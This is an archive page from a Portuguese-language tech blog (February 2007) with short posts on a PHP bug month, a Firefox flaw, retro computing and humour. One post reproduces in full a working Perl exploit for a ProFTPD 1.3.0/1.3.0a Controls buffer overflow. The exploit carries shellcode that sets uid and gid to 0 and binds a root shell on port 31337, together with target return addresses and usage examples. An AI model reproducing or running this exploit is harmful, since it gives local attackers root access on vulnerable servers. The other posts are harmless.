weblog.bitela.net » 2007

Archive for February, 2007

Março, O Mês dos Bugs PHP

Posted by ponto on February 21st, 2007

Anunciado por Stefan Esser, o mês de Março será o “O Mês dos Bugs PHP“.
php logo

Relembramos que tal como o “O Mês dos Bugs Apple“, já falado aqui no bitela, Março será um mês em que serão reportados possíveis bugs do muito conhecido PHP.

A versão mais recente do PHP é a 5.2.1 e será sobre essa que serão maioritariamente reportados os bugs, mas estará também “debaixo de fogo” a mais usada pelos actuais programadores que usam o PHP, a versão 4.

Caso estejam interessados, vejam esta entrevista a Stefan Esser da hardened-php.net

Filed under Segurança
1 Comment

Firefox Cross-Domain Vulnerability

Posted by ponto on February 21st, 2007

Foi reportada uma falha de segurança no browser que os utilizadores do bitela mais utilizam, o Firefox 2.0.0.1.
lovely red fox

Mais informações deste bug, já corrigido, podem ser consultadas aqui, e no resto deste artigo.

(more…)

Filed under Segurança
No Comments

My Cubicle

Posted by jag on February 20th, 2007

Retirado 2geek2be1.

Filed under Humor Geek, Vídeos
3 Comments

Commodore 64

Posted by ponto on February 20th, 2007

E esta hein?

Para os mais nostálgicos, visitem isto .

Filed under Geral, Vídeos
2 Comments

ProFTPD 1.3.0/1.3.0a, Local Buffer Overflow Exploit

Posted by ponto on February 19th, 2007

O ProFTPD é um servidor de FTP muito conhecido pela sua estabilidade e segurança, quando configurado correctamente para a situação pretendida; de referir que o servidor de FTP da Sourceforge e do Slackware usam esta ferramenta.

Corre perfeitamente em várias plataformas, tais como AIX, BSD/OS, Cygwin, DG/UX, Digital Unix, FreeBSD, HP/UX, IRIX, zSeries, Linux, Mac OS X, NetBSD, OpenBSD, SCO Unix, Solaris e SunOS. Mas não tem suporte nativo para Windows.

Site Oficial: aqui.

PLAIN TEXT

PERL:

#!/usr/bin/perl -w
#
# $Id: revenge_proftpd_ctrls_26.pl, v1.1 2007/02/18 19:30:25 revenge Exp $
#
# ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
#
# Original Advisory :
# http://www.coresecurity.com/?action=item&id=1594
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from proftpd.conf)
#
# This one works for 2.6 exploitation against gcc 4.x
# Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
# I was able to use only a <bind_shell> as payload since a normal (setuid + execve) seems that doesn't work
#
# Tested against:
# - ProFTPD 1.3.0/1.3.0a on Ubuntu 6.10 compiled with gcc 4.1.2
# - ProFTPD 1.3.0/1.3.0a on Debian Etch(4.0.2-5) compiled with gcc 4.0.3
# *** Against v1.3.0a -- server *could* remain up (in a Denial of Service condition) without binding shell
#
# revenge@eleusi~$ ./revenge_proftpd_ctrls.pl /usr/local/var/proftpd/proftpd.sock 1
# [ wait some secs then nc on port 31337 ]
# anyone@anywhere:~$ nc <host> 31337
# id
# uid=0(root) gid=0(root) groups=65534(nogroup)
# exit
# [ after that server will deactivate ]
#
# See also : http://www.0xcafebabe.it/sploits/revenge_proftpd_ctrls_24.pl
#
# Alfredo "revenge" Pesoli
#
# http://www.0xcafebabe.it/
# <revenge>
#</revenge></host></bind_shell>
use strict;
use Socket;
if ( @ARGV <2 ) { &usage(); }
my $hellcode =
# *** Generated with libShellCode
# setuid(0) + setgid(0) + bind(/bin/sh) on port 31337
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x31\xdb\xb0\x2e\xcd\x80".
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80".
"\x89\xc7\x31\xc9\x66\xb9\x7a\x69\x52\x66\x51\x43\x66\x53\x89\xe1".
"\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd".
"\x80\x31\xc0\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x89\xc3".
"\x89\xd9\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\xeb\x18\x5e\x31\xc0\x88".
"\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d".
"\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
my $rsock = shift;
my $tn = shift;
my $ret;
my $req;
if ( $tn == '1' ) { $req = "A"x512; }
else { $req = "A"x520; }
use constant LSOCK => '/tmp/tmp.sock';
use constant CANARY => "\0\0\x0a\xff";
use constant JUNK => "AAAAaaaaAAAAaaaa";
my %targets = (
'1' => "\x77\xe7\xff\xff", # Ubuntu 6.10
'2' => "\x77\xe7\xff\xff" # Debian Etch 4.0.2-5
# Add here your target RET
);
my %tname = (
'1' => "Ubuntu 6.10",
'2' => "Debian Etch 4.0.2-5"
);
$ret = $targets{$tn};
my $buffer = $req.CANARY.JUNK.$ret.$hellcode;
my $l = length($buffer);
socket (SOCK, PF_UNIX, SOCK_STREAM, 0) or die "Unable to create socket : $!";
my $rfile = sockaddr_un($rsock);
unlink LSOCK;
my $lfile = sockaddr_un(LSOCK);
bind (SOCK, $lfile) or die "Unable to bind to $lfile";
chmod (00700, LSOCK);
connect (SOCK, $rfile) or die "\nUnable to connect to ".$rsock."\nMaybe server is down or incorrect path\n\n";
print "\n Buffer length => ".$l."\n";
print " Target => ".$tname{$tn}."\n";
send SOCK, pack("s2", 0),0;
send SOCK, pack("s2", 1,0),0;
send SOCK, pack("C", 188).pack("C",2).pack("s1",0),0;
send SOCK, $buffer,0;
close SOCK;
print "\n [#] Request sent - try to connect on port 31337\n\n";
sub usage() {
print "\n ProFTPD 1.3.0/1.3.0a Controls Buffer Overflow\n";
print " Alfredo \"revenge\" Pesoli\n";
print " <revenge>\n\n";
print "Usage : $0</revenge>
<path_to_unix_socket> <target>\n";
print " Ex : $0 /usr/local/var/proftpd/proftpd.sock 1\n";
print "\n Available Targets :\n";
print " 1 => 0xffffe777 (Ubuntu 6.10 - EIP after 532 bytes)\n";
print " 2 => 0xffffe777 (Debian Etch 4.0.2-5 - EIP after 540 bytes)\n\n";
exit();
}

Filed under Segurança
No Comments

Trusted Computing

Posted by jag on February 19th, 2007

Mais informação.

Filed under Segurança, Vídeos
2 Comments

Bitela no McDonalds!

Posted by luke on February 18th, 2007

Numa recente incursão ao McDonald's, reparei que eles têm computadores com internet, disponíveis ao público; ora, toca a divulgar coisas giras à populaça:
no mcdonalds
e, claro, deixei ficar assim:
bitela no mcdonalds